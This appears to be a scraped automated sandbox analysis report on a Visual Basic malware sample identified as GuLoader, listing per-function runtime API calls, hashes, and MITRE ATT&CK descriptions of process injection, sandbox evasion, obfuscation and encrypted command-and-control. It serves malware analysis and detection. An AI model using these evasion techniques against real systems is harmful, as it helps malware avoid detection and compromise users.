Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$New2$#610$#536#662CallLateListMove
String ID: Subfreshman$cvJmrvNfRhBzOP3gU202
API String ID: 214454802-1209823192
Opcode ID: fa4da0f9d3cdf4fbfba47f3c1acd286fee8b228a683fde0b68872e6f951cc1b9
Instruction ID: 13592a35046907a90330c0d25cfa7341f5d14fcd3bbc156edbc0632ca1377c7b
Opcode Fuzzy Hash: fa4da0f9d3cdf4fbfba47f3c1acd286fee8b228a683fde0b68872e6f951cc1b9
Instruction Fuzzy Hash: 45A14D71D00218AFCB14DFA5DA49ADEFBB8FF48300F1081AAE549F72A1D6745A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCC0, Relevance: 31.7, APIs: 21, Instructions: 171COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00403E18,00403E18), ref: 0041FD1C
#513.MSVBVM60(?,?,00000002), ref: 0041FD36
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041FD52
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041FD65
#610.MSVBVM60(00000008), ref: 0041FD7B
#552.MSVBVM60(?,00000008,00000001), ref: 0041FD8B
__vbaVarMove.MSVBVM60 ref: 0041FD97
__vbaFreeVar.MSVBVM60 ref: 0041FDA6
#703.MSVBVM60(00000008,000000FF,000000FE,000000FE,000000FE), ref: 0041FDC2
__vbaStrMove.MSVBVM60 ref: 0041FDCD
__vbaFreeVar.MSVBVM60 ref: 0041FDD6
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041FDEA
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,0000004C), ref: 0041FE0F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403B7C,0000002C), ref: 0041FE59
__vbaFreeObj.MSVBVM60 ref: 0041FE62
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FE7B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FE94
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B20,00000090), ref: 0041FEBB
__vbaFreeObj.MSVBVM60 ref: 0041FECA
__vbaFreeStr.MSVBVM60(0041FF0B), ref: 0041FEFB
__vbaFreeVar.MSVBVM60 ref: 0041FF04

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#513#552#610#703List
String ID:
API String ID: 1404482011-0
Opcode ID: 7739a8e39d5ea7eb270a8c6088a4da60c254e406ced37285105d6661819cee11
Instruction ID: 0cc3ff6d58a148c0366706f8f044996252b8739f308693cf15366617a8da1c82
Opcode Fuzzy Hash: 7739a8e39d5ea7eb270a8c6088a4da60c254e406ced37285105d6661819cee11
Instruction Fuzzy Hash: 18611871900219AFCB14DFA4DD89AEEBBB8FF48701F10422AE506B72A1D7B45946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004200B0, Relevance: 30.1, APIs: 20, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004200F3
#538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 00420106
#557.MSVBVM60(?), ref: 00420110
__vbaFreeVar.MSVBVM60 ref: 00420127
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 00420148
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0042016D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,000000D8), ref: 00420197
__vbaStrMove.MSVBVM60 ref: 004201AC
__vbaFreeObj.MSVBVM60 ref: 004201B1
#535.MSVBVM60 ref: 004201B7
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 004201D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004201EB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B8C,00000050), ref: 0042020C
#667.MSVBVM60(?), ref: 00420226
__vbaStrMove.MSVBVM60 ref: 00420231
__vbaFreeObj.MSVBVM60 ref: 00420236
__vbaFreeVar.MSVBVM60 ref: 0042023F
__vbaFreeStr.MSVBVM60(0042027F), ref: 00420272
__vbaFreeStr.MSVBVM60 ref: 00420277
__vbaFreeStr.MSVBVM60 ref: 0042027C

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#535#538#557#667Copy
String ID:
API String ID: 1266673281-0
Opcode ID: 8af0e548dd61a5ea3113d315429363366c4eb24fa56d6d2d3a0d2186114c0284
Instruction ID: 4fee4f6263ea4b0debd7d0513ecb3bd13281583f76e313c06c4fd772fc74cfa4
Opcode Fuzzy Hash: 8af0e548dd61a5ea3113d315429363366c4eb24fa56d6d2d3a0d2186114c0284
Instruction Fuzzy Hash: 6E516D71A00218ABCB14DFA0EE88EDEBBF8FF58701F104126E542B32A0DB745945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004208F0, Relevance: 13.6, APIs: 9, Instructions: 83COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401976), ref: 0042090E
__vbaOnError.MSVBVM60(00000000,?,?,?,?,00401976), ref: 0042094A
#677.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40100000,0000000A,0000000A), ref: 00420990
__vbaFpR8.MSVBVM60 ref: 00420996
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 004209D5
__vbaOnError.MSVBVM60(000000FF,?,?,00401976), ref: 004209EF
#593.MSVBVM60(0000000A), ref: 00420A0E
__vbaFreeVar.MSVBVM60 ref: 00420A1A
#570.MSVBVM60(000000B2), ref: 00420A33

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$ErrorFree$#570#593#677ChkstkList
String ID:
API String ID: 520763419-0
Opcode ID: 529ee949cddd1a4c1271db748d997db7c1aee16d2c4b2b02f35def20f41cb7ff
Instruction ID: 037692de8801d495e193b93f8ef359468599f0bca218ffe44952e55233ea568b
Opcode Fuzzy Hash: 529ee949cddd1a4c1271db748d997db7c1aee16d2c4b2b02f35def20f41cb7ff
Instruction Fuzzy Hash: 583117B0900308EBEB10DF90DA49BDEBBB4FF04704F608159F645BA2A1D7B95A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB30, Relevance: 12.1, APIs: 8, Instructions: 106COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FB89
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FBA8
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FBC4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FBDD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B20,00000048), ref: 0041FBFA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C18,000001EC), ref: 0041FC3A
__vbaFreeStr.MSVBVM60 ref: 0041FC43
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041FC53

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID:
API String ID: 2509323985-0
Opcode ID: 06380d235b90d7ec4dad5c77646b27531862b9d0e9c249b288916dfd2871559a
Instruction ID: 8b50aea3f4ab9b7398fd657b5ee8925da451ae534b1f924258616da53f49e8e6
Opcode Fuzzy Hash: 06380d235b90d7ec4dad5c77646b27531862b9d0e9c249b288916dfd2871559a
Instruction Fuzzy Hash: 97414170A40214AFDB10DF68C945FDE7BB8FB0CB00F10816AF505F7251D6799946CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF40, Relevance: 12.1, APIs: 8, Instructions: 101COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FF93
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FFB2
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FFCE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FFE7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B00,00000148), ref: 0042000A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C18,000001EC), ref: 0042004A
__vbaFreeStr.MSVBVM60 ref: 00420053
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420063

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID:
API String ID: 2509323985-0
Opcode ID: 49a515ebcdbe4c42b7cd2d3691439e4249df83e40fa141d7aeacb35cc993873e
Instruction ID: b9db7ce4df81974eb9cfc310ba097b2900e3bd5d1af487fa03bf1c8fe5450330
Opcode Fuzzy Hash: 49a515ebcdbe4c42b7cd2d3691439e4249df83e40fa141d7aeacb35cc993873e
Instruction Fuzzy Hash: 00314F70A00214AFD710DF68DD49F9E7BF8FB09B00F10812AF545F72A1D6789946CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041F543
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F55C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C18,000001EC), ref: 0041F5A4
__vbaFreeObj.MSVBVM60 ref: 0041F5AD

Strings

Protozoers3, xrefs: 0041F573

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Protozoers3
API String ID: 1645334062-1714416233
Opcode ID: 88dc460cfcba2aed5e010d3a7d6fd5dc3b175c42b050caaf85bea71649d85b8c
Instruction ID: ca895a8dda229d52730363878bd4bd73f6d1ae992a7ed310c9a9f13431f7185c
Opcode Fuzzy Hash: 88dc460cfcba2aed5e010d3a7d6fd5dc3b175c42b050caaf85bea71649d85b8c
Instruction Fuzzy Hash: 7D118E70A00305BFD7109F68CE49F9ABBB9FB08701F108139F505B3291D7789906CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5E0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041F623
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F63C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B60,000001D0), ref: 0041F67F
__vbaFreeObj.MSVBVM60 ref: 0041F688

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: a7d625c61c10dde317c1cc4e3cd056d035e5c00792f019e8f465ffec91adf621
Instruction ID: a98105ba4c357f997c94a0637de497bd7b2d80e318a4ae7fce763eeb5e101d70
Opcode Fuzzy Hash: a7d625c61c10dde317c1cc4e3cd056d035e5c00792f019e8f465ffec91adf621
Instruction Fuzzy Hash: 58114674A00305AFD710DF68CA49F9ABBB8FB48700F108539F545F76A0D7786945CBA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report d81yNmZHaE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: d81yNmZHaE.exe PID: 5416 Parent PID: 5696

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: d81yNmZHaE.exe PID: 5416 Parent PID: 5696 d81yNmZHaE.exeCOMMON

Executed Functions

Function 004055DB, Relevance: 12.6, APIs: 1, Strings: 7, Instructions: 568
memoryCOMMONCrypto